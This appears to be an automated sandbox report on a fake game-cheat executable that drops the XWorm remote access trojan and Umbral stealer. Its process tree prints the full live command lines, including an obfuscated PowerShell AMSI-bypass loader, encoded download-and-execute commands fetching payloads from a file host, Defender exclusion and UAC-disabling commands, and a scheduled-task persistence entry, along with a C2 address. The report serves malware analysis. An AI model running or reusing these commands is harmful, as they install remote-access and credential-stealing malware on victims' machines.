Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/03/2025, 22:10

General

  • Target

    LUKZICHEAT3DAY.exe

  • Size

    20.3MB

  • MD5

    69d03c7e2b083db3e8cccad7c2a74a53

  • SHA1

    7bad6b251222991bb5b91bf688ee9d2a4d57db0b

  • SHA256

    4ce6de7deccb1a06aa6a77ed6efca36fa9bf9dd9a83fa390b011cbba6dc61fc1

  • SHA512

    192befdb4d19881848c4b3d560363e828fc579859bcc8db9d84836c0adfeec05205660114129bc897ed13129a81878b74e06a70657f4b7a1fb8f3e560cbc679f

  • SSDEEP

    393216:gUHyrS/7hf6ETSBHwD3xAk/yzmAhy7M3WzkQYFKyOkgoPY25a5Xt8eox7F1GYVAw:gUHyUhf9TWexVPAhy7MWk5ngiY2MJoxJ

Malware Config

Extracted

Family

xworm

Version

3.1

C2

185.172.175.125:5000

Mutex

Uto2xJheY5reQlME

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 3 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 45 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 62 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:620
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:344
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{c6c760be-1e5b-49ce-85e2-ee0a53399f6a}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1460
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:684
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:952
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:748
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:992
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1092
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1112
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1184
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:692
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HsVlFRMlBTui{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$tZqkBRJhPRMzEc,[Parameter(Position=1)][Type]$jXvWqZxDfk)$MlDQzdyJaVF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'ef'+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+'el'+'e'+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+'r'+'yM'+[Char](111)+''+'d'+'ule',$False).DefineType('My'+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+'g'+''+'a'+''+[Char](116)+''+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'','C'+'l'+''+'a'+''+'s'+'s'+','+''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+'ea'+[Char](108)+''+'e'+''+'d'+''+[Char](44)+'An'+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'Au'+'t'+'o'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$MlDQzdyJaVF.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+'Hi'+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$tZqkBRJhPRMzEc).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+'nag'+[Char](101)+''+[Char](100)+'');$MlDQzdyJaVF.DefineMethod('I'+'n'+'v'+'o'+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+'i'+'d'+''+'e'+''+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+','+'Ne'+'w'+''+[Char](83)+''+[Char](108)+''+'o'+'t'+','+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+'al',$jXvWqZxDfk,$tZqkBRJhPRMzEc).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+','+'M'+[Char](97)+''+[Char](110)+''+'a'+''+'g'+'e'+[Char](100)+'');Write-Output $MlDQzdyJaVF.CreateType();}$uvRCNYhGbmXhJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.dl'+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+'i'+''+'n'+''+[Char](51)+''+[Char](50)+'.'+'U'+'ns'+[Char](97)+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$NHcfcfCdmYqSAg=$uvRCNYhGbmXhJ.GetMethod(''+[Char](71)+''+'e'+'tP'+[Char](114)+'oc'+'A'+''+[Char](100)+''+'d'+'r'+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+'a'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MgyvGgnsfoeTfwOKogN=HsVlFRMlBTui @([String])([IntPtr]);$gPSkqppyzvOhGqzBkUbwpy=HsVlFRMlBTui @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PkmlRuKjvFt=$uvRCNYhGbmXhJ.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+''+'H'+''+[Char](97)+''+[Char](110)+'d'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+[Char](110)+'e'+[Char](108)+'3'+[Char](50)+''+'.'+'d'+[Char](108)+''+[Char](108)+'')));$ioDyTqtyvXNTni=$NHcfcfCdmYqSAg.Invoke($Null,@([Object]$PkmlRuKjvFt,[Object]('L'+'o'+''+[Char](97)+'d'+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+'a'+'ryA')));$eytxCBmZjasWXQUsm=$NHcfcfCdmYqSAg.Invoke($Null,@([Object]$PkmlRuKjvFt,[Object](''+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$WFCuiSQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ioDyTqtyvXNTni,$MgyvGgnsfoeTfwOKogN).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$ymCIgSOnCnkddyNpW=$NHcfcfCdmYqSAg.Invoke($Null,@([Object]$WFCuiSQ,[Object]('A'+[Char](109)+''+[Char](115)+''+'i'+''+'S'+''+'c'+''+'a'+''+[Char](110)+'Bu'+'f'+'f'+[Char](101)+''+[Char](114)+'')));$pGXYolkvhd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eytxCBmZjasWXQUsm,$gPSkqppyzvOhGqzBkUbwpy).Invoke($ymCIgSOnCnkddyNpW,[uint32]8,4,[ref]$pGXYolkvhd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ymCIgSOnCnkddyNpW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eytxCBmZjasWXQUsm,$gPSkqppyzvOhGqzBkUbwpy).Invoke($ymCIgSOnCnkddyNpW,[uint32]8,0x20,[ref]$pGXYolkvhd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](115)+'v'+[Char](115)+'t'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4932
                      • C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
                        C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
                        2⤵
                        • Executes dropped EXE
                        PID:3176
                      • C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
                        C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
                        2⤵
                        • Executes dropped EXE
                        PID:5028
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                        PID:1204
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1280
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                          1⤵
                            PID:1332
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1396
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                              1⤵
                                PID:1440
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1468
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                    • Modifies registry class
                                    PID:2932
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1492
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1504
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1660
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1680
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1748
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1776
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1840
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1896
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1912
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1984
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:2020
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:1696
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2124
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                            1⤵
                                                              PID:2160
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2340
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2480
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2488
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2584
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2672
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2684
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2708
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2732
                                                                        • C:\Windows\system32\wbem\unsecapp.exe
                                                                          C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                          1⤵
                                                                            PID:3004
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:3048
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                              1⤵
                                                                                PID:764
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3336
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of UnmapMainImage
                                                                                  PID:3436
                                                                                  • C:\Users\Admin\AppData\Local\Temp\LUKZICHEAT3DAY.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\LUKZICHEAT3DAY.exe"
                                                                                    2⤵
                                                                                    • Checks computer location settings
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4828
                                                                                    • C:\Users\Admin\LUKZI CHEAT 3 DAY.exe
                                                                                      "C:\Users\Admin\LUKZI CHEAT 3 DAY.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:1524
                                                                                      • C:\Users\Admin\LUKZI CHEAT 3 DAY.exe
                                                                                        "C:\Users\Admin\LUKZI CHEAT 3 DAY.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4268
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Anti Crash.bat" "
                                                                                      3⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4344
                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        4⤵
                                                                                          PID:4304
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          PowerShell -WindowStyle Hidden -Command "$codes = 104,116,116,112,115,58,47,47,102,105,108,101,115,46,99,97,116,98,111,120,46,109,111,101,47,99,122,49,50,57,114,46,48,48,69,113,113;irm $([Text.Encoding]::ASCII.GetString(@($codes))) | iex"
                                                                                          4⤵
                                                                                          • Blocklisted process makes network request
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Downloads MZ/PE file
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2004
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXEcUTIONPoLICY ByPASS AdD-mPPrefEReNce -exCLUSioNPatH $eNv:PROGraMdatA, $enV:TeMp, $ENV:hoMeDRIvE; SEt-iTEmPRopErTy -PaTh "HKLM:\SOFTwArE\MicroSoFt\wINDOWs\curRenTVERsiON\PoLiCieS\sySTEm" -nAME "ConSENtprOmPTbEHAViorAdMIN" -VAluE 0 -tYPe DwoRD
                                                                                            5⤵
                                                                                            • UAC bypass
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1488
                                                                                          • C:\ProgramData\FMyUS.eXe
                                                                                            "C:\ProgramData\FMyUS.eXe"
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:1008
                                                                                            • C:\Users\Admin\AppData\Local\Temp\bgzsaLFn.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\bgzsaLFn.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2300
                                                                                          • C:\ProgramData\svOrbEl0.exe
                                                                                            "C:\ProgramData\svOrbEl0.exe"
                                                                                            5⤵
                                                                                            • Checks computer location settings
                                                                                            • Drops startup file
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2744
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svOrbEl0.exe'
                                                                                              6⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:3872
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                7⤵
                                                                                                  PID:2008
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svOrbEl0.exe'
                                                                                                6⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1456
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  7⤵
                                                                                                    PID:1568
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svOrbEl0.exe'
                                                                                                  6⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3396
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    7⤵
                                                                                                      PID:3592
                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svOrbEl0" /tr "C:\Users\Admin\AppData\Roaming\svOrbEl0.exe"
                                                                                                    6⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:2772
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      7⤵
                                                                                                        PID:3968
                                                                                                  • C:\ProgramData\1ZRs6.EXe
                                                                                                    "C:\ProgramData\1ZRs6.EXe"
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:3316
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c mountvol | find ":\"
                                                                                                  4⤵
                                                                                                    PID:376
                                                                                                    • C:\Windows\system32\mountvol.exe
                                                                                                      mountvol
                                                                                                      5⤵
                                                                                                        PID:2380
                                                                                                      • C:\Windows\system32\find.exe
                                                                                                        find ":\"
                                                                                                        5⤵
                                                                                                          PID:4056
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -c add-mppreference -exclusionpath C:\
                                                                                                        4⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4556
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -c add-mppreference -exclusionpath F:\
                                                                                                        4⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1616
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -c add-mppreference -exclusionpath D:\
                                                                                                        4⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3964
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -Command "$url = @();$url += 'h';$url += 't';$url += 't';$url += 'p';$url += 's';$url += ':';$url += '/';$url += '/';$url += 'f';$url += 'i';$url += 'l';$url += 'e';$url += 's';$url += '.';$url += 'c';$url += 'a';$url += 't';$url += 'b';$url += 'o';$url += 'x';$url += '.';$url += 'm';$url += 'o';$url += 'e';$url += '/';$url += '3';$url += 'b';$url += 'f';$url += 'w';$url += 's';$url += 'd';$url += '.';$url += 'G';$url += 'P';$url += '7';$url += 'B';$url += 'f';$url = $url -join '';$output = \"$env:PUBLIC\winglog32.exe\";$output2 = \"$env:PUBLIC\winglog64.exe\"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -Wait"
                                                                                                        4⤵
                                                                                                        • Blocklisted process makes network request
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Downloads MZ/PE file
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1420
                                                                                                        • C:\Users\Public\winglog32.exe
                                                                                                          "C:\Users\Public\winglog32.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:780
                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                            "wmic.exe" csproduct get uuid
                                                                                                            6⤵
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:4056
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              7⤵
                                                                                                                PID:5004
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                    1⤵
                                                                                                      PID:3544
                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                      1⤵
                                                                                                        PID:3736
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:3976
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:4104
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                            1⤵
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:2328
                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                            1⤵
                                                                                                              PID:2408
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                              1⤵
                                                                                                                PID:1452
                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                1⤵
                                                                                                                  PID:4012
                                                                                                                • C:\Windows\system32\svchost.exe
